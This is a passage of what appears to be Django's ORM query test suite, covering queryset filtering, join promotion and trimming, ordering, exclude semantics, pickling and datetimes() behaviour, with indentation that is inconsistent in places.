# involve one "left outer" join (Author -> Item is 0-to-many).
qs = Author.objects.filter(id=self.a1.id).filter(Q(extra__note=self.n1) | Q(item__note=self.n3))
self.assertEqual(
len([
x for x in qs.query.alias_map.values()
if x.join_type == LOUTER and qs.query.alias_refcount[x.table_alias]
]),
1
)
# The previous changes shouldn't affect nullable foreign key joins.
self.assertSequenceEqual(
Tag.objects.filter(parent__isnull=True).order_by('name'),
[self.t1]
)
self.assertSequenceEqual(
Tag.objects.exclude(parent__isnull=True).order_by('name'),
[self.t2, self.t3, self.t4, self.t5],
)
self.assertSequenceEqual(
Tag.objects.exclude(Q(parent__name='t1') | Q(parent__isnull=True)).order_by('name'),
[self.t4, self.t5],
)
self.assertSequenceEqual(
Tag.objects.exclude(Q(parent__isnull=True) | Q(parent__name='t1')).order_by('name'),
[self.t4, self.t5],
)
self.assertSequenceEqual(
Tag.objects.exclude(Q(parent__parent__isnull=True)).order_by('name'),
[self.t4, self.t5],
)
self.assertSequenceEqual(
Tag.objects.filter(~Q(parent__parent__isnull=True)).order_by('name'),
[self.t4, self.t5],
)
def test_ticket2091(self):
t = Tag.objects.get(name='t4')
self.assertSequenceEqual(Item.objects.filter(tags__in=[t]), [self.i4])
def test_avoid_infinite_loop_on_too_many_subqueries(self):
    """Deeply nested __in subqueries raise RecursionError with a clear
    message instead of looping forever while generating aliases."""
    x = Tag.objects.filter(pk=1)
    local_recursion_limit = sys.getrecursionlimit() // 16
    msg = 'Maximum recursion depth exceeded: too many subqueries.'
    with self.assertRaisesMessage(RecursionError, msg):
        for i in range(local_recursion_limit + 2):
            x = Tag.objects.filter(pk__in=x)
def test_reasonable_number_of_subq_aliases(self):
    """Subquery aliases progress T..Z then AA, AB, ... for deep nesting."""
    x = Tag.objects.filter(pk=1)
    for _ in range(20):
        x = Tag.objects.filter(pk__in=x)
    self.assertEqual(
        x.query.subq_aliases, {
            'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'AA', 'AB', 'AC', 'AD',
            'AE', 'AF', 'AG', 'AH', 'AI', 'AJ', 'AK', 'AL', 'AM', 'AN',
        }
    )
def test_heterogeneous_qs_combination(self):
# Combining querysets built on different models should behave in a well-defined
# fashion. We raise an error.
msg = 'Cannot combine queries on two different base models.'
with self.assertRaisesMessage(TypeError, msg):
Author.objects.all() & Tag.objects.all()
with self.assertRaisesMessage(TypeError, msg):
Author.objects.all() | Tag.objects.all()
    def test_ticket3141(self):
        """count() works on querysets with extra(select=...) columns,
        both with literal and parameterized select expressions."""
        self.assertEqual(Author.objects.extra(select={'foo': '1'}).count(), 4)
        self.assertEqual(
            Author.objects.extra(select={'foo': '%s'}, select_params=(1,)).count(),
            4
        )
    def test_ticket2400(self):
        """isnull=True on a reverse relation matches rows with no related
        objects (Author with no Item; Tag with no Item)."""
        self.assertSequenceEqual(
            Author.objects.filter(item__isnull=True),
            [self.a3],
        )
        self.assertSequenceEqual(
            Tag.objects.filter(item__isnull=True),
            [self.t5],
        )
    def test_ticket2496(self):
        """extra(tables=...) combined with select_related() and slicing
        produces a valid query."""
        self.assertSequenceEqual(
            Item.objects.extra(tables=['queries_author']).select_related().order_by('name')[:1],
            [self.i4],
        )
def test_error_raised_on_filter_with_dictionary(self):
with self.assertRaisesMessage(FieldError, 'Cannot parse keyword query as dict'):
Note.objects.filter({'note': 'n1', 'misc': 'foo'})
    def test_tickets_2076_7256(self):
        """Ordering across related tables: spanning joins, remote default
        ordering, many-valued orderings, and join trimming when the default
        ordering is replaced."""
        # Ordering on related tables should be possible, even if the table is
        # not otherwise involved.
        self.assertSequenceEqual(
            Item.objects.order_by('note__note', 'name'),
            [self.i2, self.i4, self.i1, self.i3],
        )
        # Ordering on a related field should use the remote model's default
        # ordering as a final step.
        self.assertSequenceEqual(
            Author.objects.order_by('extra', '-name'),
            [self.a2, self.a1, self.a4, self.a3],
        )
        # Using remote model default ordering can span multiple models (in this
        # case, Cover is ordered by Item's default, which uses Note's default).
        self.assertSequenceEqual(Cover.objects.all(), [self.c1, self.c2])
        # If the remote model does not have a default ordering, we order by its 'id'
        # field.
        self.assertSequenceEqual(
            Item.objects.order_by('creator', 'name'),
            [self.i1, self.i3, self.i2, self.i4],
        )
        # Ordering by a many-valued attribute (e.g. a many-to-many or reverse
        # ForeignKey) is legal, but the results might not make sense. That
        # isn't Django's problem. Garbage in, garbage out.
        self.assertSequenceEqual(
            Item.objects.filter(tags__isnull=False).order_by('tags', 'id'),
            [self.i1, self.i2, self.i1, self.i2, self.i4],
        )
        # If we replace the default ordering, Django adjusts the required
        # tables automatically. Item normally requires a join with Note to do
        # the default ordering, but that isn't needed here.
        qs = Item.objects.order_by('name')
        self.assertSequenceEqual(qs, [self.i4, self.i1, self.i3, self.i2])
        # Only the base table should be in the alias map: the Note join is gone.
        self.assertEqual(len(qs.query.alias_map), 1)
    def test_tickets_2874_3002(self):
        """select_related() with related ordering keeps multiple Note joins
        distinct (the item's note vs. the creator's extra note)."""
        qs = Item.objects.select_related().order_by('note__note', 'name')
        self.assertQuerysetEqual(qs, [self.i2, self.i4, self.i1, self.i3])
        # This is also a good select_related() test because there are multiple
        # Note entries in the SQL. The two Note items should be different.
        self.assertEqual(repr(qs[0].note), '<Note: n2>')
        self.assertEqual(repr(qs[0].creator.extra.note), '<Note: n1>')
    def test_ticket3037(self):
        """ORing two multi-keyword Q objects keeps each Q's conditions tied
        to the same join."""
        self.assertSequenceEqual(
            Item.objects.filter(Q(creator__name='a3', name='two') | Q(creator__name='a4', name='four')),
            [self.i4],
        )
    def test_tickets_5321_7070(self):
        """values().distinct() includes ordering columns in the output, so
        rows that differ only in the ordering column are not collapsed."""
        # Ordering columns must be included in the output columns. Note that
        # this means results that might otherwise be distinct are not (if there
        # are multiple values in the ordering cols), as in this example. This
        # isn't a bug; it's a warning to be careful with the selection of
        # ordering columns.
        self.assertSequenceEqual(
            Note.objects.values('misc').distinct().order_by('note', '-misc'),
            [{'misc': 'foo'}, {'misc': 'bar'}, {'misc': 'foo'}]
        )
    def test_ticket4358(self):
        """values() accepts both the "foo" and "foo_id" spellings for a
        ForeignKey column."""
        # If you don't pass any fields to values(), relation fields are
        # returned as "foo_id" keys, not "foo". For consistency, you should be
        # able to pass "foo_id" in the fields list and have it work, too. We
        # actually allow both "foo" and "foo_id".
        # The *_id version is returned by default.
        self.assertIn('note_id', ExtraInfo.objects.values()[0])
        # You can also pass it in explicitly.
        self.assertSequenceEqual(ExtraInfo.objects.values('note_id'), [{'note_id': 1}, {'note_id': 2}])
        # ...or use the field name.
        self.assertSequenceEqual(ExtraInfo.objects.values('note'), [{'note': 1}, {'note': 2}])
    def test_ticket6154(self):
        """Chained filter() calls are ANDed, regardless of which call holds
        the OR-ed Q object."""
        # Multiple filter statements are joined using "AND" all the time.
        self.assertSequenceEqual(
            Author.objects.filter(id=self.a1.id).filter(Q(extra__note=self.n1) | Q(item__note=self.n3)),
            [self.a1],
        )
        self.assertSequenceEqual(
            Author.objects.filter(Q(extra__note=self.n1) | Q(item__note=self.n3)).filter(id=self.a1.id),
            [self.a1],
        )
    def test_ticket6981(self):
        """select_related() across a nullable self-referential FK returns
        all rows, including those with a NULL parent."""
        self.assertSequenceEqual(
            Tag.objects.select_related('parent').order_by('name'),
            [self.t1, self.t2, self.t3, self.t4, self.t5],
        )
    def test_ticket9926(self):
        """select_related() with multiple and with nested relation paths
        returns the full result set."""
        self.assertSequenceEqual(
            Tag.objects.select_related("parent", "category").order_by('name'),
            [self.t1, self.t2, self.t3, self.t4, self.t5],
        )
        self.assertSequenceEqual(
            Tag.objects.select_related('parent', "parent__category").order_by('name'),
            [self.t1, self.t2, self.t3, self.t4, self.t5],
        )
    def test_tickets_6180_6203(self):
        """datetimes() supports count(), len(), and indexing."""
        # Dates with limits and/or counts
        self.assertEqual(Item.objects.count(), 4)
        self.assertEqual(Item.objects.datetimes('created', 'month').count(), 1)
        self.assertEqual(Item.objects.datetimes('created', 'day').count(), 2)
        self.assertEqual(len(Item.objects.datetimes('created', 'day')), 2)
        self.assertEqual(Item.objects.datetimes('created', 'day')[0], datetime.datetime(2007, 12, 19, 0, 0))
    def test_tickets_7087_12242(self):
        """datetimes() composes with extra() in either order, for both
        extra select columns and extra where clauses."""
        # Dates with extra select columns
        self.assertSequenceEqual(
            Item.objects.datetimes('created', 'day').extra(select={'a': 1}),
            [datetime.datetime(2007, 12, 19, 0, 0), datetime.datetime(2007, 12, 20, 0, 0)],
        )
        self.assertSequenceEqual(
            Item.objects.extra(select={'a': 1}).datetimes('created', 'day'),
            [datetime.datetime(2007, 12, 19, 0, 0), datetime.datetime(2007, 12, 20, 0, 0)],
        )
        name = "one"
        self.assertSequenceEqual(
            Item.objects.datetimes('created', 'day').extra(where=['name=%s'], params=[name]),
            [datetime.datetime(2007, 12, 19, 0, 0)],
        )
        self.assertSequenceEqual(
            Item.objects.extra(where=['name=%s'], params=[name]).datetimes('created', 'day'),
            [datetime.datetime(2007, 12, 19, 0, 0)],
        )
    def test_ticket7155(self):
        """datetimes() on a nullable field skips NULL values."""
        # Nullable dates
        self.assertSequenceEqual(
            Item.objects.datetimes('modified', 'day'),
            [datetime.datetime(2007, 12, 19, 0, 0)],
        )
    def test_order_by_rawsql(self):
        """order_by() accepts a RawSQL expression alongside field names."""
        self.assertSequenceEqual(
            Item.objects.values('note__note').order_by(
                RawSQL('queries_note.note', ()),
                'id',
            ),
            [
                {'note__note': 'n2'},
                {'note__note': 'n3'},
                {'note__note': 'n3'},
                {'note__note': 'n3'},
            ],
        )
    def test_ticket7096(self):
        """exclude() with multiple conditions, including nested negations
        over multi-valued (m2m) relations, produces correct results."""
        # Make sure exclude() with multiple conditions continues to work.
        self.assertSequenceEqual(
            Tag.objects.filter(parent=self.t1, name='t3').order_by('name'),
            [self.t3],
        )
        self.assertSequenceEqual(
            Tag.objects.exclude(parent=self.t1, name='t3').order_by('name'),
            [self.t1, self.t2, self.t4, self.t5],
        )
        self.assertSequenceEqual(
            Item.objects.exclude(tags__name='t1', name='one').order_by('name').distinct(),
            [self.i4, self.i3, self.i2],
        )
        self.assertSequenceEqual(
            Item.objects.filter(name__in=['three', 'four']).exclude(tags__name='t1').order_by('name'),
            [self.i4, self.i3],
        )
        # More twisted cases, involving nested negations.
        self.assertSequenceEqual(
            Item.objects.exclude(~Q(tags__name='t1', name='one')),
            [self.i1],
        )
        self.assertSequenceEqual(
            Item.objects.filter(~Q(tags__name='t1', name='one'), name='two'),
            [self.i2],
        )
        self.assertSequenceEqual(
            Item.objects.exclude(~Q(tags__name='t1', name='one'), name='two'),
            [self.i4, self.i1, self.i3],
        )
    def test_tickets_7204_7506(self):
        """Querysets with related fields are picklable."""
        # Make sure querysets with related fields can be pickled. If this
        # doesn't crash, it's a Good Thing.
        pickle.dumps(Item.objects.all())
    def test_ticket7813(self):
        """A pickled/unpickled select_related() query compiles to the same
        SQL as the original."""
        # We should also be able to pickle things that use select_related().
        # The only tricky thing here is to ensure that we do the related
        # selections properly after unpickling.
        qs = Item.objects.select_related()
        query = qs.query.get_compiler(qs.db).as_sql()[0]
        query2 = pickle.loads(pickle.dumps(qs.query))
        self.assertEqual(
            query2.get_compiler(qs.db).as_sql()[0],
            query
        )
def test_deferred_load_qs_pickling(self):
# Check pickling of deferred-loading querysets
qs = Item.objects.defer('name', 'creator')
q2 = pickle.loads(pickle.dumps(qs))
self.assertEqual(list(qs), list(q2))
q3 = pickle.loads(pickle.dumps(qs, pickle.HIGHEST_PROTOCOL))
self.assertEqual(list(qs), list(q3))
    def test_ticket7277(self):
        """ORed Q objects spanning a self-referential relation at several
        depths work on a related manager."""
        self.assertSequenceEqual(
            self.n1.annotation_set.filter(
                Q(tag=self.t5) | Q(tag__children=self.t5) | Q(tag__children__children=self.t5)
            ),
            [self.ann1],
        )
    def test_tickets_7448_7707(self):
        """datetime objects can be used directly in an __in lookup."""
        # Complex objects should be converted to strings before being used in
        # lookups.
        self.assertSequenceEqual(
            Item.objects.filter(created__in=[self.time1, self.time2]),
            [self.i1, self.i2],
        )
    def test_ticket7235(self):
        """Every refinement of an EmptyQuerySet stays empty and hits the
        database zero times; slicing restrictions still apply."""
        # An EmptyQuerySet should not raise exceptions if it is filtered.
        Eaten.objects.create(meal='m')
        q = Eaten.objects.none()
        with self.assertNumQueries(0):
            self.assertQuerysetEqual(q.all(), [])
            self.assertQuerysetEqual(q.filter(meal='m'), [])
            self.assertQuerysetEqual(q.exclude(meal='m'), [])
            self.assertQuerysetEqual(q.complex_filter({'pk': 1}), [])
            self.assertQuerysetEqual(q.select_related('food'), [])
            self.assertQuerysetEqual(q.annotate(Count('food')), [])
            self.assertQuerysetEqual(q.order_by('meal', 'food'), [])
            self.assertQuerysetEqual(q.distinct(), [])
            self.assertQuerysetEqual(
                q.extra(select={'foo': "1"}),
                []
            )
            self.assertQuerysetEqual(q.reverse(), [])
            # Simulate a slice having been taken; extra() must then refuse.
            q.query.low_mark = 1
            msg = 'Cannot change a query once a slice has been taken.'
            with self.assertRaisesMessage(TypeError, msg):
                q.extra(select={'foo': "1"})
            self.assertQuerysetEqual(q.defer('meal'), [])
            self.assertQuerysetEqual(q.only('meal'), [])
    def test_ticket7791(self):
        """Ordering plus distinct() across a reverse FK works, and
        datetimes() querysets are picklable."""
        # There were "issues" when ordering and distinct-ing on fields related
        # via ForeignKeys.
        self.assertEqual(
            len(Note.objects.order_by('extrainfo__info').distinct()),
            3
        )
        # Pickling of QuerySets using datetimes() should work.
        qs = Item.objects.datetimes('created', 'month')
        pickle.loads(pickle.dumps(qs))
    def test_ticket9997(self):
        """An inner values()/values_list() queryset used as a filter value
        must select exactly one field; multi-field inner querysets raise."""
        # If a ValuesList or Values queryset is passed as an inner query, we
        # make sure it's only requesting a single value and use that as the
        # thing to select.
        self.assertSequenceEqual(
            Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values('name')),
            [self.t2, self.t3],
        )
        # Multi-valued values() and values_list() querysets should raise errors.
        with self.assertRaisesMessage(TypeError, 'Cannot use multi-field values as a filter value.'):
            Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values('name', 'id'))
        with self.assertRaisesMessage(TypeError, 'Cannot use multi-field values as a filter value.'):
            Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values_list('name', 'id'))
    def test_ticket9985(self):
        """values_list(...).values(...) chains work, including as inner
        querysets for an __in filter."""
        # qs.values_list(...).values(...) combinations should work.
        self.assertSequenceEqual(
            Note.objects.values_list("note", flat=True).values("id").order_by("id"),
            [{'id': 1}, {'id': 2}, {'id': 3}]
        )
        self.assertSequenceEqual(
            Annotation.objects.filter(notes__in=Note.objects.filter(note="n1").values_list('note').values('id')),
            [self.ann1],
        )
def test_ticket10205(self):
# When bailing out early because of an empty "__in" filter, we need
# to set things up correctly internally so that subqueries can continue properly.
self.assertEqual(Tag.objects.filter(name__in=()).update(name="foo"), 0)
    def test_ticket10432(self):
        """Generators (empty and non-empty) are accepted as __in values."""
        # Testing an empty "__in" filter with a generator as the value.
        def f():
            return iter([])
        n_obj = Note.objects.all()[0]
        def g():
            yield n_obj.pk
        self.assertQuerysetEqual(Note.objects.filter(pk__in=f()), [])
        self.assertEqual(list(Note.objects.filter(pk__in=g())), [n_obj])
    def test_ticket10742(self):
        """A queryset used inside an __in clause stays an SQL subquery: its
        own result cache is never populated."""
        # Queries used in an __in clause don't execute subqueries
        subq = Author.objects.filter(num__lt=3000)
        qs = Author.objects.filter(pk__in=subq)
        self.assertSequenceEqual(qs, [self.a1, self.a2])
        # The subquery result cache should not be populated
        self.assertIsNone(subq._result_cache)
        subq = Author.objects.filter(num__lt=3000)
        qs = Author.objects.exclude(pk__in=subq)
        self.assertSequenceEqual(qs, [self.a3, self.a4])
        # The subquery result cache should not be populated
        self.assertIsNone(subq._result_cache)
        subq = Author.objects.filter(num__lt=3000)
        self.assertSequenceEqual(
            Author.objects.filter(Q(pk__in=subq) & Q(name='a1')),
            [self.a1],
        )
        # The subquery result cache should not be populated
        self.assertIsNone(subq._result_cache)
    def test_ticket7076(self):
        """exclude() keeps rows whose compared column is NULL."""
        # Excluding shouldn't eliminate NULL entries.
        self.assertSequenceEqual(
            Item.objects.exclude(modified=self.time1).order_by('name'),
            [self.i4, self.i3, self.i2],
        )
        self.assertSequenceEqual(
            Tag.objects.exclude(parent__name=self.t1.name),
            [self.t1, self.t4, self.t5],
        )
    def test_ticket7181(self):
        """Ordering across nullable relations keeps all rows, and empty
        querysets combine correctly with | and &."""
        # Ordering by related tables should accommodate nullable fields (this
        # test is a little tricky, since NULL ordering is database dependent.
        # Instead, we just count the number of results).
        self.assertEqual(len(Tag.objects.order_by('parent__name')), 5)
        # Empty querysets can be merged with others.
        self.assertSequenceEqual(
            Note.objects.none() | Note.objects.all(),
            [self.n1, self.n2, self.n3],
        )
        self.assertSequenceEqual(
            Note.objects.all() | Note.objects.none(),
            [self.n1, self.n2, self.n3],
        )
        self.assertSequenceEqual(Note.objects.none() & Note.objects.all(), [])
        self.assertSequenceEqual(Note.objects.all() & Note.objects.none(), [])
    def test_ticket8439(self):
        """Disjunctions over nullable relation chains promote only the
        necessary joins to LEFT OUTER (exactly one in the final check)."""
        # Complex combinations of conjunctions, disjunctions and nullable
        # relations.
        self.assertSequenceEqual(
            Author.objects.filter(Q(item__note__extrainfo=self.e2) | Q(report=self.r1, name='xyz')),
            [self.a2],
        )
        self.assertSequenceEqual(
            Author.objects.filter(Q(report=self.r1, name='xyz') | Q(item__note__extrainfo=self.e2)),
            [self.a2],
        )
        self.assertSequenceEqual(
            Annotation.objects.filter(Q(tag__parent=self.t1) | Q(notes__note='n1', name='a1')),
            [self.ann1],
        )
        xx = ExtraInfo.objects.create(info='xx', note=self.n3)
        self.assertSequenceEqual(
            Note.objects.filter(Q(extrainfo__author=self.a1) | Q(extrainfo=xx)),
            [self.n1, self.n3],
        )
        q = Note.objects.filter(Q(extrainfo__author=self.a1) | Q(extrainfo=xx)).query
        # Only one referenced alias in the query should be a LEFT OUTER join.
        self.assertEqual(
            len([x for x in q.alias_map.values() if x.join_type == LOUTER and q.alias_refcount[x.table_alias]]),
            1
        )
    def test_ticket17429(self):
        """
        Meta.ordering=None works the same as Meta.ordering=[]
        """
        original_ordering = Tag._meta.ordering
        Tag._meta.ordering = None
        try:
            self.assertCountEqual(
                Tag.objects.all(),
                [self.t1, self.t2, self.t3, self.t4, self.t5],
            )
        finally:
            # Restore the class-level ordering so other tests are unaffected.
            Tag._meta.ordering = original_ordering
    def test_exclude(self):
        """exclude(cond) is equivalent to filter(~Q(cond)), including for
        OR-ed and negated conditions."""
        self.assertQuerysetEqual(
            Item.objects.exclude(tags__name='t4'),
            Item.objects.filter(~Q(tags__name='t4')))
        self.assertQuerysetEqual(
            Item.objects.exclude(Q(tags__name='t4') | Q(tags__name='t3')),
            Item.objects.filter(~(Q(tags__name='t4') | Q(tags__name='t3'))))
        self.assertQuerysetEqual(
            Item.objects.exclude(Q(tags__name='t4') | ~Q(tags__name='t3')),
            Item.objects.filter(~(Q(tags__name='t4') | ~Q(tags__name='t3'))))
    def test_nested_exclude(self):
        """exclude(~Q(cond)) is equivalent to a double negation filter."""
        self.assertQuerysetEqual(
            Item.objects.exclude(~Q(tags__name='t4')),
            Item.objects.filter(~~Q(tags__name='t4')))
    def test_double_exclude(self):
        """Double negation (~~Q and ~Q(~Q(...))) equals the plain filter."""
        self.assertQuerysetEqual(
            Item.objects.filter(Q(tags__name='t4')),
            Item.objects.filter(~~Q(tags__name='t4')))
        self.assertQuerysetEqual(
            Item.objects.filter(Q(tags__name='t4')),
            Item.objects.filter(~Q(~Q(tags__name='t4'))))
    def test_exclude_in(self):
        """Negation equivalences also hold for __in lookups over m2m."""
        self.assertQuerysetEqual(
            Item.objects.exclude(Q(tags__name__in=['t4', 't3'])),
            Item.objects.filter(~Q(tags__name__in=['t4', 't3'])))
        self.assertQuerysetEqual(
            Item.objects.filter(Q(tags__name__in=['t4', 't3'])),
            Item.objects.filter(~~Q(tags__name__in=['t4', 't3'])))
    def test_ticket_10790_1(self):
        """isnull filters on a direct nullable FK need no JOIN at all."""
        # Querying direct fields with isnull should trim the left outer join.
        # It also should not create INNER JOIN.
        q = Tag.objects.filter(parent__isnull=True)
        self.assertSequenceEqual(q, [self.t1])
        self.assertNotIn('JOIN', str(q.query))
        q = Tag.objects.filter(parent__isnull=False)
        self.assertSequenceEqual(q, [self.t2, self.t3, self.t4, self.t5])
        self.assertNotIn('JOIN', str(q.query))
        q = Tag.objects.exclude(parent__isnull=True)
        self.assertSequenceEqual(q, [self.t2, self.t3, self.t4, self.t5])
        self.assertNotIn('JOIN', str(q.query))
        q = Tag.objects.exclude(parent__isnull=False)
        self.assertSequenceEqual(q, [self.t1])
        self.assertNotIn('JOIN', str(q.query))
        q = Tag.objects.exclude(parent__parent__isnull=False)
        self.assertSequenceEqual(q, [self.t1, self.t2, self.t3])
        # A two-level path keeps one LEFT OUTER JOIN and no INNER JOIN.
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
        self.assertNotIn('INNER JOIN', str(q.query))
    def test_ticket_10790_2(self):
        """isnull=False across two tables strips only the last join; the
        preceding join stays INNER."""
        # Querying across several tables should strip only the last outer join,
        # while preserving the preceding inner joins.
        q = Tag.objects.filter(parent__parent__isnull=False)
        self.assertSequenceEqual(q, [self.t4, self.t5])
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(q.query).count('INNER JOIN'), 1)
        # Querying without isnull should not convert anything to left outer join.
        q = Tag.objects.filter(parent__parent=self.t1)
        self.assertSequenceEqual(q, [self.t4, self.t5])
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(q.query).count('INNER JOIN'), 1)
    def test_ticket_10790_3(self):
        """Reverse-relation isnull filters keep the LEFT OUTER JOIN they
        require, trimming only the final join in longer chains."""
        # Querying via indirect fields should populate the left outer join
        q = NamedCategory.objects.filter(tag__isnull=True)
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
        # join to dumbcategory ptr_id
        self.assertEqual(str(q.query).count('INNER JOIN'), 1)
        self.assertSequenceEqual(q, [])
        # Querying across several tables should strip only the last join, while
        # preserving the preceding left outer joins.
        q = NamedCategory.objects.filter(tag__parent__isnull=True)
        self.assertEqual(str(q.query).count('INNER JOIN'), 1)
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
        self.assertSequenceEqual(q, [self.nc1])
    def test_ticket_10790_4(self):
        """isnull=True through an m2m keeps the intermediary table joined
        (as LEFT OUTER), never stripping it."""
        # Querying across m2m field should not strip the m2m table from join.
        q = Author.objects.filter(item__tags__isnull=True)
        self.assertSequenceEqual(q, [self.a2, self.a3])
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 2)
        self.assertNotIn('INNER JOIN', str(q.query))
        q = Author.objects.filter(item__tags__parent__isnull=True)
        self.assertSequenceEqual(q, [self.a1, self.a2, self.a2, self.a3])
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 3)
        self.assertNotIn('INNER JOIN', str(q.query))
    def test_ticket_10790_5(self):
        """isnull=False through an m2m uses only INNER JOINs, one per hop."""
        # Querying with isnull=False across m2m field should not create outer joins
        q = Author.objects.filter(item__tags__isnull=False)
        self.assertSequenceEqual(q, [self.a1, self.a1, self.a2, self.a2, self.a4])
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(q.query).count('INNER JOIN'), 2)
        q = Author.objects.filter(item__tags__parent__isnull=False)
        self.assertSequenceEqual(q, [self.a1, self.a2, self.a4])
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(q.query).count('INNER JOIN'), 3)
        q = Author.objects.filter(item__tags__parent__parent__isnull=False)
        self.assertSequenceEqual(q, [self.a4])
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(q.query).count('INNER JOIN'), 4)
    def test_ticket_10790_6(self):
        """isnull=True through an m2m uses only LEFT OUTER JOINs."""
        # Querying with isnull=True across m2m field should not create inner joins
        # and strip last outer join
        q = Author.objects.filter(item__tags__parent__parent__isnull=True)
        self.assertSequenceEqual(
            q,
            [self.a1, self.a1, self.a2, self.a2, self.a2, self.a3],
        )
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 4)
        self.assertEqual(str(q.query).count('INNER JOIN'), 0)
        q = Author.objects.filter(item__tags__parent__isnull=True)
        self.assertSequenceEqual(q, [self.a1, self.a2, self.a2, self.a3])
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 3)
        self.assertEqual(str(q.query).count('INNER JOIN'), 0)
    def test_ticket_10790_7(self):
        """Reverse FK isnull filters keep their join: LEFT OUTER when
        matching NULLs, INNER otherwise."""
        # Reverse querying with isnull should not strip the join
        q = Author.objects.filter(item__isnull=True)
        self.assertSequenceEqual(q, [self.a3])
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
        self.assertEqual(str(q.query).count('INNER JOIN'), 0)
        q = Author.objects.filter(item__isnull=False)
        self.assertSequenceEqual(q, [self.a1, self.a2, self.a2, self.a4])
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(q.query).count('INNER JOIN'), 1)
    def test_ticket_10790_8(self):
        """An OR of isnull=True with a direct FK match needs no join."""
        # Querying with combined q-objects should also strip the left outer join
        q = Tag.objects.filter(Q(parent__isnull=True) | Q(parent=self.t1))
        self.assertSequenceEqual(q, [self.t1, self.t2, self.t3])
        self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(q.query).count('INNER JOIN'), 0)
    def test_ticket_10790_combine(self):
        """Combining querysets with | and & does not reintroduce joins that
        each side had already trimmed."""
        # Combining queries should not re-populate the left outer join
        q1 = Tag.objects.filter(parent__isnull=True)
        q2 = Tag.objects.filter(parent__isnull=False)
        q3 = q1 | q2
        self.assertSequenceEqual(q3, [self.t1, self.t2, self.t3, self.t4, self.t5])
        self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
        q3 = q1 & q2
        self.assertSequenceEqual(q3, [])
        self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
        q2 = Tag.objects.filter(parent=self.t1)
        q3 = q1 | q2
        self.assertSequenceEqual(q3, [self.t1, self.t2, self.t3])
        self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
        q3 = q2 | q1
        self.assertSequenceEqual(q3, [self.t1, self.t2, self.t3])
        self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
        q1 = Tag.objects.filter(parent__isnull=True)
        q2 = Tag.objects.filter(parent__parent__isnull=True)
        # Two-level paths keep exactly the one LEFT OUTER JOIN they need,
        # regardless of combination order.
        q3 = q1 | q2
        self.assertSequenceEqual(q3, [self.t1, self.t2, self.t3])
        self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 1)
        self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
        q3 = q2 | q1
        self.assertSequenceEqual(q3, [self.t1, self.t2, self.t3])
        self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 1)
        self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
    def test_ticket19672(self):
        """A conjunction of isnull=False with a negated related-field
        condition filters correctly."""
        self.assertSequenceEqual(
            Report.objects.filter(Q(creator__isnull=False) & ~Q(creator__extra__value=41)),
            [self.r1],
        )
    def test_ticket_20250(self):
        """A negated Q on an annotated queryset compiles and returns all
        matching rows (regression from Django 1.4)."""
        # A negated Q along with an annotated queryset failed in Django 1.4
        qs = Author.objects.annotate(Count('item'))
        qs = qs.filter(~Q(extra__value=0)).order_by('name')
        self.assertIn('SELECT', str(qs.query))
        self.assertSequenceEqual(qs, [self.a1, self.a2, self.a3, self.a4])
    def test_lookup_constraint_fielderror(self):
        """Filtering on an unknown field raises FieldError listing the
        valid field choices."""
        msg = (
            "Cannot resolve keyword 'unknown_field' into field. Choices are: "
            "annotation, category, category_id, children, id, item, "
            "managedmodel, name, note, parent, parent_id"
        )
        with self.assertRaisesMessage(FieldError, msg):
            Tag.objects.filter(unknown_field__name='generic')
    def test_common_mixed_case_foreign_keys(self):
        """
        Valid query should be generated when fields fetched from joined tables
        include FKs whose names only differ by case.
        """
        c1 = SimpleCategory.objects.create(name='c1')
        c2 = SimpleCategory.objects.create(name='c2')
        c3 = SimpleCategory.objects.create(name='c3')
        category = CategoryItem.objects.create(category=c1)
        mixed_case_field_category = MixedCaseFieldCategoryItem.objects.create(CaTeGoRy=c2)
        mixed_case_db_column_category = MixedCaseDbColumnCategoryItem.objects.create(category=c3)
        CommonMixedCaseForeignKeys.objects.create(
            category=category,
            mixed_case_field_category=mixed_case_field_category,
            mixed_case_db_column_category=mixed_case_db_column_category,
        )
        # Selecting both the FK columns and spanning through them must not
        # confuse the identically-named (case-insensitively) columns.
        qs = CommonMixedCaseForeignKeys.objects.values(
            'category',
            'mixed_case_field_category',
            'mixed_case_db_column_category',
            'category__category',
            'mixed_case_field_category__CaTeGoRy',
            'mixed_case_db_column_category__category',
        )
        self.assertTrue(qs.first())
    def test_excluded_intermediary_m2m_table_joined(self):
        """A negated condition with an F() expression across an m2m keeps
        the intermediary table joined."""
        self.assertSequenceEqual(
            Note.objects.filter(~Q(tag__annotation__name=F('note'))),
            [self.n1, self.n2, self.n3],
        )
        self.assertSequenceEqual(
